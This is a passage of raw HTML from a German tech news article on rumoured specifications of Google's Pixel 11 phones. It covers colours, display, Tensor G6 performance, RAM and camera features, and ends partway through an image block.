<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b6785"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Pixel-11-Pro-case.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="" class="wp-image-3083654" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">ThinBorne</p></div>



<p>Zwar lassen sich aus einer Hülle nur begrenzt Rückschlüsse ziehen, doch die Aussparung für die Kamera deutet darauf hin, dass es einen etwas größeren, aber massiveren Kameraausleger geben könnte. </p>



<p>Sollte dies zutreffen, dürfte dies verhindern, dass die Kameras in Ihrer Hosentasche hervorstehen – ein Problem, das im Jahr 2026 immer größer zu werden scheint (die Kamerawölbung <a href="https://www.pcwelt.de/article/3041397/honor-magic-8-pro-test.html" target="_blank" rel="noreferrer noopener">des Honor Magic 8 Pro</a> ist in einer Jeans schon aus einem Kilometer Entfernung zu erkennen). Ob dies auch eine Änderung der verbauten Sensoren beim Pixel 11 Pro XL bedeutet, bleibt abzuwarten.</p>



<p>Was die Farbvarianten angeht, hat die Android 17 QPR1 Beta möglicherweise ein Licht auf die Sache geworfen, da sie zwei Hintergrundbilder enthält, die angeblich mit dem Pixel 11 Pro Fold in Verbindung stehen und die <a href="https://9to5google.com/2026/04/23/pixel-11-pro-fold-wallpaper-leak/">Namen „Lunar Tides“ sowie „Tidal Swirl“ tragen</a>.</p>



<p>In der Vergangenheit waren die von Google mitgelieferten Hintergrundbilder in der Regel so gestaltet, dass sie zur Außenfarbe der jeweils neuesten Smartphones passten. Während „Lunar Tides“ einen monochromen Stil aufweist, der dem „Moonstone“-Farbdesign des 10 Pro Fold nicht allzu unähnlich ist, ist es „Tidal Swirl“, das einen dunkleren Grünton aufweist, als wir ihn von der aktuellen Generation der Pixel-Smartphones kennen.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b6cde"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/Google-Pixel-11-Fold-wallpaper.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="" class="wp-image-3126177" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">9to5Google</p></div>



<p>Bei genauerer Betrachtung der Beta-Version lässt sich feststellen, dass diese Hintergrundbilder mit Codenamen verknüpft sind, wobei „Midnight“ und „Pine“ jeweils mit „Lunar Tides“ und „Tidal Swirl“ gepaart sind. Obwohl sich zum jetzigen Zeitpunkt noch nicht genau sagen lässt, wie viele der Pixel-11-Geräte die potenziell ansprechende „Pine“-Variante erhalten könnten, sind diese Neuigkeiten ein gutes Zeichen für alle, die eine grüne Farbvariante auf ihrem Gerät bevorzugen.</p>



<p>Seitdem diese „Pro Fold“-Hintergrundbilder durchgesickert sind, <a href="https://t.me/mysticleaks/184" target="_blank" rel="noreferrer noopener">sind weitere aufgetaucht</a>, die darauf hindeuten, was die anderen Smartphones der Reihe erwarten könnte – und dies deutet auf eine Gesamtstrategie hin, mit der Google möglicherweise von einigen der eher bombastischen Farben der Vergangenheit abrücken möchte.</p>



<p>Für das Pixel 11 liegen uns vier Hintergrundbilder vor, die alle in gedeckteren Farbtönen gehalten sind und sich deutlich vom fast neonartigen „Lemongrass“ des Pixel 10 oder dem „Berry“ des <a href="https://www.pcwelt.de/article/3104634/google-pixel-10a-test.html" target="_blank" rel="noreferrer noopener">Pixel 10a </a>unterscheiden.</p>



<ul class="wp-block-list">
<li>Schwarz</li>



<li>Grün</li>



<li>Rot/Rosa</li>



<li>Lila/Grau</li>
</ul>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b727c"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Pixel-11-wallpaper.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Pixel 11 wallpaper" class="wp-image-3156410" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mystic Leaks</p></div>



<p>Ähnlich verhält es sich mit dem 11 Pro und dem Pro XL, da diese dem gleichen Designkonzept folgen, jedoch eine leicht abweichende Farbpalette aufweisen. Sollten diese Hintergrundbilder – wie in den vergangenen Jahren – nahtlos mit den Farbvarianten der Hardware harmonieren, können wir für das Jahr 2026 eine noch raffiniertere Auswahl an Pixel-Smartphones erwarten.</p>



<ul class="wp-block-list">
<li>Beige/Braun</li>



<li>Blau/Silber</li>



<li>Grün</li>



<li>Schwarz</li>
</ul>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b77d1"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Pixel-11-Pro-wallpaper.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="Pixel 11 Pro wallpaper" class="wp-image-3156412" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mystic Leaks</p></div>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-1 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF1"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-1 POST @@-->


<div class="wp-block-listicle-chart"><div class="listicle-chart-separator"></div><div class="wp-block-listicle-chart-item listicle-chart-item">
<h3 class="wp-block-heading">Pixel 11: Display</h3>



<p>Google wird bei der Pixel-11-Serie voraussichtlich weiterhin auf hochauflösende OLED-Displays setzen, wobei Verbesserungen bei Helligkeit, Farbgenauigkeit und Bildwiederholfrequenz zu erwarten sind.</p>



<p>Die einzige Neuigkeit, die uns hierzu vorliegt, ist, dass Google für die Pixel-11-Reihe <a href="https://m.etnews.com/20260409000346" target="_blank" rel="noreferrer noopener">angeblich das Spitzenmodell M16 OLED-Panel von Samsung Display verwenden wird</a>, womit es den iPhone-18-Pro-Modellen (und auch den Galaxy-Modellen von Samsung Mobile) zuvorkommen wird.</p>



<p>Es liegen zwar noch kaum Details vor, doch das Panel dürfte in puncto Helligkeit, Farbwiedergabe, Lebensdauer und Energieeffizienz das Beste bieten.</p>



<p>Sollte Google die Displaygröße im Vergleich zur Pixel-10-Serie nicht ändern, gelten für die Pixel-10-Modelle folgende Spezifikationen:</p>



<ul class="wp-block-list">
<li>Pixel 10: 6,3-Zoll-Actua-OLED, 3.000 Nits</li>



<li>Pixel 10 Pro: 6,3-Zoll-Super-Actua-LTPO-OLED, 3.300 Nits</li>



<li>Pixel 10 Pro XL: 6,8-Zoll-Super-Actua-LTPO-OLED, 3.300 Nits</li>



<li>Pixel 10 Pro Fold: 8-Zoll-Super-Actua-Flex-LTPO-OLED, 3.000 Nits</li>
</ul>



<p>Angesichts der aktuellen Trends könnte die Pixel-11-Serie die derzeitige Obergrenze von 120 Hertz bei der Bildwiederholfrequenz überschreiten und so flüssigeres Scrollen sowie reaktionsschnellere Interaktionen ermöglichen.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b80cc"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/google-pixel-10-pro-xl-3.jpg?quality=50&amp;strip=all&amp;w=1200" alt="google pixel 10 pro xl 3" class="wp-image-2884902" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Der Bildschirm des Pixel 11 Pro XL</figcaption></figure><p class="imageCredit">Anyron Copeman / Foundry</p></div>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-2 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF2"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-2 POST @@-->


<div class="wp-block-listicle-chart"><div class="listicle-chart-separator"></div><div class="wp-block-listicle-chart-item listicle-chart-item">
<h3 class="wp-block-heading">Pixel 11: Leistung</h3>



<p>Google wird bei der Pixel-11-Reihe mit dem Tensor G6 auf einen neuen Chipsatz umsteigen. Auch wenn dies für niemanden eine Überraschung sein dürfte (ein neuer Tensor-Chip ist seit Jahren ein fester Bestandteil jeder neuen Generation), gibt es dieses Mal einige Verbesserungen, die einen enormen Einfluss auf die Leistung haben könnten.</p>



<p>Eine der ersten Informationen, auf die wir stießen, stammt noch aus der Zeit, bevor das Pixel 10 überhaupt in den Handel kam: Einem <a href="https://x.com/dnystedt/status/1936955306397086001" target="_blank" rel="noreferrer noopener">Bericht</a> zufolge soll der neue Tensor G6 im effizienteren 2-Nanometer-Verfahren hergestellt werden, was erhebliche Auswirkungen auf die alltägliche Leistungsfähigkeit der CPU haben könnte.</p>



<figure class="wp-block-embed is-type-rich is-provider-x wp-block-embed-x"><div class="wp-block-embed__wrapper">
<blockquote class="twitter-tweet" data-width="500" data-dnt="true"><p lang="en" dir="ltr">Google’s Tensor G6 smartphone chip will be made with TSMC’s 2nm production process, media report, citing unnamed supply chain sources, and adding the Tensor G5 was transferred to TSMC from Samsung and will be inside Pixel smartphones later this year. Meanwhile, Tesla’ AI 5 chips…</p>— Dan Nystedt (@dnystedt) <a href="https://x.com/dnystedt/status/1936955306397086001?ref_src=twsrc%5Etfw">June 23, 2025</a></blockquote>
</div></figure>



<p>Geht man noch einen Schritt weiter, scheint es nun so, als würde Google auf <a href="https://t.me/mysticleaks/161?comment=48458">den neuesten C1-Ultra-Kern von Arm</a> umsteigen, der eine Taktrate von 4,11 GHz erreichen kann. Zum Vergleich: Das entspricht der Taktrate des Mediatek Dimensity 9500, der das Super-Flaggschiff <a href="https://www.pcwelt.de/article/2967222/oppo-find-x9-pro-test.html" target="_blank" rel="noreferrer noopener">Oppo Find X9 Pro</a> antreibt.</p>



<p>Angesichts der Tatsache, wie stark Google die KI-Verarbeitung auf dem Gerät selbst vorantreibt, könnte ein effizienterer Tensor-Chip Google in Zukunft auch mehr Spielraum für komplexere KI-gesteuerte Aufgaben bieten.</p>



<p>Ein weiterer <a href="https://t.me/mysticleaks/144" target="_blank" rel="noreferrer noopener">Bericht</a> deutet darauf hin, dass Google neben dem Tensor G6 von einem Modem der Marke Samsung (was bislang die Regel war) auf ein von Mediatek hergestelltes Modem umsteigen wird.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b884e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro-Fold-review-29.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro Fold review 29" class="wp-image-2454265" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Bei dem betreffenden Modem handelt es sich um das MediaTek M90, das eine Reihe bemerkenswerter Funktionen bietet, darunter die Unterstützung von Sub-6- und mmWave-5G-Daten sowie Satellitenkonnektivität. </p>



<p>Die Möglichkeit, in Notfällen eine Satellitenverbindung herzustellen, ist mittlerweile eine allgemein erwartete Funktion bei Flaggschiff-Smartphones, nachdem Apple mit „Emergency SOS“ diesen Trend ins Leben gerufen hat; daher ist es naheliegend, dass Google hier der Konkurrenz einen Schritt voraus sein möchte.</p>



<p>Erwähnenswert ist auch, dass das Modem von Mediatek in Kombination mit dem Tensor G6 energieeffizienter sein könnte, was den Weg für eine längere Akkulaufzeit ebnet. Wir werden es erst mit Sicherheit wissen, wenn wir die Pixel-11-Smartphones zum Testen in die Hände bekommen, aber es ist eine schöne Vorstellung – zumal einige der Pixel-10-Modelle in diesem Bereich nicht gerade glänzen.</p>



<p>Ein bedauerliches Gerücht, das zunehmend an Bedeutung gewinnt, besagt, dass Google dem derzeit von Unternehmen wie Apple und Samsung gesetzten Trend nicht folgen wird, das 128-GB-Modell zugunsten eines 256-GB-Basismodells wegzulassen – was einer unserer größten Kritikpunkte an den bestehenden Pixel-10-Smartphones war.</p>



<p>128 GB Speicherplatz reichen im Jahr 2026 angesichts von Fotos, Videos und unverzichtbaren Apps einfach nicht mehr aus, daher hoffen wir aufrichtig, dass sich dieses Gerücht nicht bewahrheitet, doch es könnte letztendlich ein Ausschlusskriterium für High-End-Nutzer sein, die mehr Speicherplatz wünschen, ohne hohe Summen für ein teureres Modell oder einen Cloud-Abonnementdienst zahlen zu müssen.</p>



<p>Erschwerend kommt hinzu, dass die neuesten Gerüchte zum Pixel 11 nun darauf hindeuten, dass zwar die CPU-Leistung besser sein soll als zuvor, die neue GPU jedoch gar nicht so neu sein wird, da stattdessen ein PowerVR CXTP-48-1536 zum Einsatz kommen soll, der bereits im Jahr 2021 auf den Markt kam.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b8e1f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/Pixel-10-Pro-Fold-review-18.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Pixel 10 Pro Fold review 18" class="wp-image-2931715" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Auch wenn die PowerVR-GPU möglicherweise eine leichte Leistungssteigerung gegenüber der Pixel-10-Reihe bietet, wäre dies dennoch eine große Enttäuschung, sollte sich dies bestätigen, da damit die derzeit an der Tensor G5 geäußerte Kritik ignoriert wird. Die Gaming-Leistung auf jedem Pixel-10-Smartphone entspricht einfach nicht dem Standard, den man von einem Flaggschiff-Gerät erwarten würde – die neuesten <a href="https://www.pcwelt.de/article/3108173/samsung-galaxy-s26-test.html" target="_blank" rel="noreferrer noopener">Galaxy-S26-Modelle</a> sind ihnen dabei weit überlegen. Für die Gamer unter Ihnen könnte es sich lohnen, sich bei Ihrem nächsten Upgrade anderweitig umzusehen.</p>



<p>Interessant ist, dass – sicherlich als Reaktion auf die aktuelle Speicherkrise, die durch die KI-Entwicklung angeheizt wird – das Pixel 11 Pro und Pro XL nun offenbar mit zwei verschiedenen RAM-Varianten ausgeliefert werden sollen: eine mit 12 GB und die andere mit den üblichen 16 GB.</p>



<p>Zum Hintergrund: 16 GB RAM sind seit dem Pixel 9 Pro der Standard bei Googles Pixels der Pro-Klasse; dass das Unternehmen nun bei einer so zentralen Spezifikation einen Rückzieher macht, sagt viel über den aktuellen Stand der Branche aus. Dies könnte bedeuten, dass die 12-GB-Variante notwendig ist, um das 11 Pro und das Pro XL weiterhin zum gleichen Preis wie ihre Vorgängermodelle anbieten zu können.</p>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-3 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF3"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-3 POST @@-->


<div class="wp-block-listicle-chart"><div class="listicle-chart-separator"></div><div class="wp-block-listicle-chart-item listicle-chart-item">
<h3 class="wp-block-heading">Pixel 11: Kameras</h3>



<p>Die Kameraausstattung der Pixel-11-Serie entwickelt sich zu einer der fortschrittlichsten, die es bei einem Flaggschiff-Smartphone gibt, wobei Google sowohl Hardware als auch KI nutzt, um die Foto- und Videoqualität zu verbessern.</p>



<p>Eines der herausragenden Merkmale, das vom Pixel 11 <a href="https://www.androidauthority.com/google-pixel-10-and-pixel-11-camera-ai-features-3494468/" target="_blank" rel="noreferrer noopener">erwartet </a>wird, ist ein Teleobjektiv der nächsten Generation, das einen bis zu 100-fachen Zoom unterstützt. Diese beeindruckende Zoomfähigkeit, unterstützt durch Algorithmen des maschinellen Lernens im Tensor-G6-Prozessor von Google, könnte darauf abzielen, ähnliche Funktionen von Wettbewerbern wie Samsung zu übertreffen oder ihnen sogar den Rang abzulaufen.</p>



<p>Der 100-fache Zoom ermöglicht es Nutzern, selbst aus großer Entfernung bemerkenswert detailreiche Bilder und Videos aufzunehmen, und setzt damit einen neuen Maßstab für die Zoomqualität von Smartphones. Wir wissen, dass einige der Pixel-10-Modelle einen 100-fachen Super-Res-Zoom bieten; das Pixel 11 dürfte diesem Standard daher mindestens entsprechen.</p>



<p>Außerdem haben wir gesehen, dass das reguläre Pixel 10 ein Teleobjektiv erhalten hat, wenn auch nicht in derselben Qualität wie die Pro-Modelle. Auch hier könnte eine Dreifach-Kamera auf der Rückseite nun zum Standard für Pixel-Smartphones werden.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b9642"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/Google-Pixel-10-Lemongrass-2.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 10 Lemongrass 2" class="wp-image-2883754" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Chris Martin / Foundry</p></div>



<p>Gerüchten zufolge soll das Pixel 11 zudem über einen verbesserten „Cinematic Blur“-Modus verfügen, der den immersiven „Bokeh“-Effekt in Videos verstärkt. Diese Funktion wird voraussichtlich 4K-Videos mit 30 Bildern pro Sekunde unterstützen und so eine kinoreife Qualität bieten, die das Storytelling in Videos auf ein neues Niveau hebt.</p>



<p>Darüber hinaus könnte eine neue „Video Relight“-Option eingeführt werden, mit der Nutzer die Lichtverhältnisse innerhalb eines aufgenommenen Videos anpassen können, um in Echtzeit Lichtveränderungen zu simulieren und den Szenen so mehr Tiefe und Dramatik zu verleihen. Diese Funktion wird Berichten zufolge von der „Cinematic Rendering Engine“ im Tensor G6 unterstützt, wodurch der Stromverbrauch, der typischerweise mit unscharfen Videoaufnahmen verbunden ist, erheblich reduziert wird.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4b9b4c"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro-Fold-review-27.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro Fold review 27" class="wp-image-2454276" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Eine weitere spannende Neuerung ist der „Ultra Low Light Video“-Modus, auch als „Night Sight Video“ bezeichnet, der darauf ausgelegt ist, die Videoqualität bei schlechten Lichtverhältnissen zu verbessern.</p>



<p>Im Gegensatz zu früheren „Night Sight“-Videomodi, die eine Cloud-Verarbeitung erforderten, soll diese Funktion dank der fortschrittlichen Bildverarbeitungsfähigkeiten des Tensor-G6-Chips vollständig auf dem Gerät selbst ausgeführt werden.</p>



<p><a href="https://www.androidauthority.com/google-pixel-10-and-pixel-11-camera-ai-features-3494468/" target="_blank" rel="noreferrer noopener">Android Authority</a> berichtet, dass Google den „Ultra Low Light Video“-Modus so konzipiert hat, dass er in Umgebungen mit einer Umgebungshelligkeit zwischen 5 und 10 Lux – was in etwa der Helligkeit eines schwach beleuchteten Raums oder von Kerzenlicht entspricht – optimale Ergebnisse liefert.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4ba090"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro_review_13.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro review 13" class="wp-image-2457629" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
